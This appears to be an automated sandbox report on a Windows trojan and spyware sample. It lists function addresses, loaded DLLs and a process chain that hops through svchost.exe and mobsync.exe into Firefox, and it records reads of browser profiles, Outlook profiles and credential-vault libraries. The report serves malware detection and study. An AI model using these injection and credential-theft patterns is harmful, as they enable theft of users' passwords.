Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D781CC	5_2_04D781CC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D801AA	5_2_04D801AA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D741A2	5_2_04D741A2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D48158	5_2_04D48158
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CB0100	5_2_04CB0100
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D5A118	5_2_04D5A118
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D402C0	5_2_04D402C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D60274	5_2_04D60274
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CCE3F0	5_2_04CCE3F0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D803E6	5_2_04D803E6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7A352	5_2_04D7A352
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CB0CF2	5_2_04CB0CF2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D60CB5	5_2_04D60CB5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC0C00	5_2_04CC0C00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CBADE0	5_2_04CBADE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CD8DBF	5_2_04CD8DBF
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D5CD1F	5_2_04D5CD1F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CCAD00	5_2_04CCAD00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7EEDB	5_2_04D7EEDB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7CE93	5_2_04D7CE93
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CD2E90	5_2_04CD2E90
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC0E59	5_2_04CC0E59
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7EE26	5_2_04D7EE26
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CB2FC8	5_2_04CB2FC8
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CCCFE0	5_2_04CCCFE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D3EFA0	5_2_04D3EFA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D34F40	5_2_04D34F40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D62F30	5_2_04D62F30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D02F28	5_2_04D02F28
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CE0F30	5_2_04CE0F30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CEE8F0	5_2_04CEE8F0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CA68B8	5_2_04CA68B8
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CCA840	5_2_04CCA840
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC2840	5_2_04CC2840
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC29A0	5_2_04CC29A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D8A9A6	5_2_04D8A9A6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CD6962	5_2_04CD6962
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CBEA80	5_2_04CBEA80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D76BD7	5_2_04D76BD7
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7AB40	5_2_04D7AB40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CB1460	5_2_04CB1460
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7F43F	5_2_04D7F43F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D895C3	5_2_04D895C3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D5D5B0	5_2_04D5D5B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D77571	5_2_04D77571
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D716CC	5_2_04D716CC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D05630	5_2_04D05630
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7F7B0	5_2_04D7F7B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC70C0	5_2_04CC70C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D6F0CC	5_2_04D6F0CC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7F0E0	5_2_04D7F0E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D770E9	5_2_04D770E9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CCB1B0	5_2_04CCB1B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF516C	5_2_04CF516C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D8B16B	5_2_04D8B16B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CAF172	5_2_04CAF172
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CDB2C0	5_2_04CDB2C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D612ED	5_2_04D612ED
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC52A0	5_2_04CC52A0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D0739A	5_2_04D0739A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CAD34C	5_2_04CAD34C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7132D	5_2_04D7132D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7FCF2	5_2_04D7FCF2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D39C32	5_2_04D39C32
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CDFDC0	5_2_04CDFDC0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC3D40	5_2_04CC3D40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D71D5A	5_2_04D71D5A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D77D73	5_2_04D77D73
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC9EB0	5_2_04CC9EB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04C83FD2	5_2_04C83FD2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04C83FD5	5_2_04C83FD5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC1F92	5_2_04CC1F92
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7FFB1	5_2_04D7FFB1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7FF09	5_2_04D7FF09
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC38E0	5_2_04CC38E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D2D800	5_2_04D2D800
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC9950	5_2_04CC9950
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CDB950	5_2_04CDB950
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D55910	5_2_04D55910
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D6DAC6	5_2_04D6DAC6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D05AA0	5_2_04D05AA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D61AA3	5_2_04D61AA3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D5DAAC	5_2_04D5DAAC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D77A46	5_2_04D77A46
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7FA49	5_2_04D7FA49
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D33A6C	5_2_04D33A6C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D35BF0	5_2_04D35BF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CFDBF9	5_2_04CFDBF9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CDFB80	5_2_04CDFB80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D7FB76	5_2_04D7FB76
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CB1CB0	5_2_02CB1CB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CACB80	5_2_02CACB80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CAAEC4	5_2_02CAAEC4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CAAED0	5_2_02CAAED0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CAAD80	5_2_02CAAD80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CACDA0	5_2_02CACDA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CB5340	5_2_02CB5340
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CB3540	5_2_02CB3540
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CCBA30	5_2_02CCBA30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6E50B	5_2_04A6E50B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6E741	5_2_04A6E741
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6E288	5_2_04A6E288
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6E3A3	5_2_04A6E3A3
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7533C	5_2_04A7533C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6D808	5_2_04A6D808
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6CA98	5_2_04A6CA98

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0332B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03375130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03387E54 appears 102 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 04D3F290 appears 105 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 04CF5130 appears 58 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 04CAB970 appears 280 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 04D07E54 appears 111 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 04D2EA12 appears 86 times
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: String function: 00468900 appears 42 times
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: String function: 00447DE1 appears 36 times
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: String function: 00460AE3 appears 70 times

Source: AxKxwW9WGa.exe, 00000000.00000003.1516699338.0000000003573000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AxKxwW9WGa.exe
Source: AxKxwW9WGa.exe, 00000000.00000003.1515962487.00000000036CD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AxKxwW9WGa.exe

Source: AxKxwW9WGa.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@9/8

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004AA06A GetLastError,FormatMessageW,

0_2_004AA06A

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004981CB AdjustTokenPrivileges,CloseHandle,		0_2_004981CB
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004987E1

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004AB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_004AB333

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004BEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_004BEE0D

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004AC397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_004AC397

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00444E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00444E89

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

File created: C:\Users\user\AppData\Local\Temp\aut8F84.tmp

Jump to behavior

Source: AxKxwW9WGa.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mobsync.exe, 00000005.00000002.3333421133.0000000002EA2000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1922007357.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3333421133.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3333421133.0000000002EC6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: AxKxwW9WGa.exe	ReversingLabs: Detection: 68%
Source: AxKxwW9WGa.exe	Virustotal: Detection: 69%

Source: unknown	Process created: C:\Users\user\Desktop\AxKxwW9WGa.exe "C:\Users\user\Desktop\AxKxwW9WGa.exe"
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AxKxwW9WGa.exe"
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AxKxwW9WGa.exe"	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: AxKxwW9WGa.exe

Static file information: File size 1224192 > 1048576

Source: AxKxwW9WGa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: AxKxwW9WGa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: AxKxwW9WGa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: AxKxwW9WGa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: AxKxwW9WGa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: AxKxwW9WGa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: AxKxwW9WGa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1703862159.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703967239.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703951936.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, TCRjLpECkFbdcm.exe, 00000004.00000003.1812833235.0000000000C4F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TCRjLpECkFbdcm.exe, 00000004.00000000.1659379641.000000000074E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: AxKxwW9WGa.exe, 00000000.00000003.1516452417.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, AxKxwW9WGa.exe, 00000000.00000003.1515414284.0000000003400000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1736320361.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644178466.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1736320361.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641782055.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1744529898.0000000004ACF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3334589578.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3334589578.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1741460974.0000000004919000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AxKxwW9WGa.exe, 00000000.00000003.1516452417.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, AxKxwW9WGa.exe, 00000000.00000003.1515414284.0000000003400000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1736320361.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644178466.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1736320361.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641782055.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000005.00000003.1744529898.0000000004ACF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3334589578.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3334589578.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1741460974.0000000004919000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1703862159.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703967239.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703951936.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, TCRjLpECkFbdcm.exe, 00000004.00000003.1812833235.0000000000C4F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: TCRjLpECkFbdcm.exe, 00000004.00000002.3337678767.00000000047EC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.00000000052AC000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3333421133.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2031668617.00000000067CC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: TCRjLpECkFbdcm.exe, 00000004.00000002.3337678767.00000000047EC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.00000000052AC000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3333421133.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2031668617.00000000067CC000.00000004.80000000.00040000.00000000.sdmp

Source: AxKxwW9WGa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: AxKxwW9WGa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: AxKxwW9WGa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: AxKxwW9WGa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: AxKxwW9WGa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00444B37 LoadLibraryA,GetProcAddress,

0_2_00444B37

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0044C4C6 push A30044BAh; retn 0044h	0_2_0044C50D
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00468945 push ecx; ret	0_2_00468958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004143C1 push cs; ret	2_2_004143C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403070 push eax; ret	2_2_00403072
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004120AF push ebp; retf	2_2_004120B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418172 push esi; retf	2_2_0041817D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AADE push ebp; iretd	2_2_0040AAE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414344 push cs; ret	2_2_004143C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417C7C push esi; iretd	2_2_00417C7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413D3D push esp; ret	2_2_00413D3E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040CE68 push ecx; retf	2_2_0040CE6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx	2_2_033309B6
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F99375 push ebp; retf	4_2_03F99376
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F9D13F push FFFFFF98h; iretd	4_2_03F9D142
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F9412E push ecx; retf	4_2_03F94131
